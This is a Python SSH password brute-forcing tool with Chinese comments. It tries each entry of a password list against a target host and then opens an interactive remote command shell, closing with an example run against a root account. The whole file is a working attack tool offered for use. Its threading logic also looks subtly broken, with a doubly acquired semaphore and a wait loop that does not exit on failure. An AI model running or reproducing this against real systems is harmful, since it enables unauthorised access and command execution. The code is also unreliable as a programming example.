import paramiko import optparse import threading import time from threading import Thread, BoundedSemaphore # 用paramiko暴力破解SSH密码 # 最大并发连接尝试的数量,可根据实际情况调整,适当减小可降低对目标服务器的压力以及减少多线程同步问题出现的概率 maxConnections = 2 # 创建一个有界信号量,用于控制并发连接的数量,初始值设为最大并发连接数 connection_lock = BoundedSemaphore(value=maxConnections) # 用于标记是否已经找到正确的密码,初始化为False,一旦找到正确密码,将被设置为True Found = False # 记录连接失败的次数,初始化为0,后续根据失败情况累加 Fails = 0 # 创建一个线程锁,用于控制打印输出,避免多线程打印时出现混乱 print_lock = threading.Lock() # 创建一个线程锁,用于控制对共享变量Found等的修改操作,保证线程安全 stop_lock = threading.Lock() def connect(host, user, password): """ 尝试使用给定的主机、用户和密码建立SSH连接 :param host: 目标主机地址 :param user: 用户名 :param password: 密码 :return: 如果成功连接返回密码(即找到的正确密码),否则返回None """ # 获取当前线程的名称,方便在打印信息中标识是哪个线程在执行操作 current_thread = threading.current_thread().name print(f"[{current_thread}] 开始尝试连接,使用密码: {password}") global Found global Fails try: print(f"[{current_thread}] 尝试获取连接锁") # 获取连接锁,保证同一时间只有指定数量(由maxConnections控制)的线程能尝试连接 connection_lock.acquire() print(f"[{current_thread}] 成功获取连接锁") ssh_client = paramiko.SSHClient() # 设置自动添加主机密钥策略,避免因未知主机密钥导致连接失败(这种方式存在一定安全风险,生产环境需谨慎使用) ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # 尝试使用给定的主机、用户和密码建立SSH连接 ssh_client.connect(host, port=22, username=user, password=password) # 获取打印锁,确保多个线程打印信息时不会出现混乱,然后打印找到密码的提示信息 with print_lock: print('[+] Password Found') # 获取停止锁,用于安全地修改共享变量Found,将其设置为True,表示已找到密码,并打印提示信息告知其他线程停止尝试 with stop_lock: Found = True print(f"[{current_thread}] 已将Found变量设置为True,表示找到密码,通知其他线程停止尝试") print(f"[{current_thread}] 成功连接,返回密码: {password}") return password except paramiko.AuthenticationException: # 获取停止锁,检查是否已经通过其他线程找到了密码,如果已找到则本线程停止尝试并返回None with stop_lock: if Found: print(f"[{current_thread}] 已找到密码(通过Found变量判断),本线程停止尝试,返回None") return None print(f"[{current_thread}] 认证失败,请检查用户名和密码是否正确") Fails += 1 # 这里将最大失败次数设置为可配置的变量MAX_FAILURES,方便根据实际情况调整 if Fails > MAX_FAILURES: with print_lock: print("[!] Exiting: Too many connection failures") print(f"[{current_thread}] 达到最大失败次数,本线程停止,返回None") return None print(f"[{current_thread}] 继续下一次尝试,返回None") return None except paramiko.SSHException as ssh_exception: with print_lock: print(f"[{current_thread}] SSH连接出现异常: {ssh_exception}") Fails += 1 if Fails > MAX_FAILURES: with print_lock: print("[!] Exiting: Too many connection failures") return None return None except Exception as e: with print_lock: print(f"[{current_thread}] 出现其他未知异常: {e}") Fails += 1 if Fails > MAX_FAILURES: with print_lock: print("[!] Exiting: Too many connection failures") return None return None finally: print(f"[{current_thread}] 准备释放连接锁") # 释放连接锁,允许其他等待的线程获取锁并尝试连接 connection_lock.release() print(f"[{current_thread}] 成功释放连接锁") def interact_with_remote(host, user, password): """ 在登录成功后,进入与远程主机的交互模式,可执行命令 :param host: 目标主机地址 :param user: 用户名 :param password: 正确密码 """ ssh_client = paramiko.SSHClient() ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh_client.connect(host, port=22, username=user, password=password) print(f"[*] 已成功登录 {host},现在可以输入命令与远程主机交互(输入 'exit' 可退出交互模式)") while True: command = input("请输入要执行的命令: ") if command.lower() == "exit": break try: stdin, stdout, stderr = ssh_client.exec_command(command) result = stdout.read().decode('utf-8') print(result) except paramiko.SSHException as e: print(f"[!] 执行命令时出现 SSH 异常: {e}") except UnicodeDecodeError: print(f"[!] 命令执行结果解码出现问题,请检查编码格式") except paramiko.AuthenticationException: print(f"[!] 交互时认证出现问题,请检查用户名和密码是否正确") except paramiko.SSHException as ssh_exception: print(f"[!] 建立交互连接时出现 SSH 异常: {ssh_exception}") except Exception as e: print(f"[!] 出现其他未知异常: e") finally: ssh_client.close() print("[*] 已退出与远程主机的交互,程序继续运行...") def main(): global MAX_FAILURES # 最大失败次数设置为20,可根据实际情况灵活调整这个值,当连接失败次数超过这个值时,线程停止尝试 MAX_FAILURES = 20 parser = optparse.OptionParser('usage: %prog -H<target host> -u<user> -F<password list>') parser.add_option('-H', dest='host', type='string', help='specify target host') parser.add_option('-u', dest='user', type='string', help='specify the user') parser.add_option('-F', dest='passwdFile', type='string', help='specify password file') (opts, args) = parser.parse_args() host = opts.host passwdFile = opts.passwdFile user = opts.user if host is None or user is None or passwdFile is None: print(parser.usage) exit(0) correct_password = None password_found_event = threading.Event() line_number = 0 # 添加变量用于记录当前读取的行数 with open(passwdFile, 'r') as fn: for line in fn.readlines(): line_number += 1 # 每读取一行,行数加1 print(f"[*] 当前读取到第 {line_number} 行,密码为: {line.strip()}") # 打印出行数和密码内容 password = line.strip() print(f"[*] 准备获取连接锁") connection_lock.acquire() print(f"[*] 成功获取连接锁") t = Thread(target=connect, args=(host, user, password)) t.name = f"Thread-{password}" t.start() print(f"[*] 开始检查密码是否找到,当前password_found_event状态: {password_found_event.is_set()}") while True: if Found: correct_password = password password_found_event.set() print(f"[*] 已找到密码,设置password_found_event事件") break time.sleep(0.01) print(f"[*] 结束本次密码检查,当前password_found_event状态: {password_found_event.is_set()}") if password_found_event.is_set(): print(f"[*] 检测到password_found_event已设置,准备跳出外层循环") break if password_found_event.is_set(): interact_with_remote(host, user, correct_password) if __name__ == '__main__': main() 运行命令python3 your_script_name.py -H 192.168.1.100 -u root -F /path/to/passwords.txt
运行结果: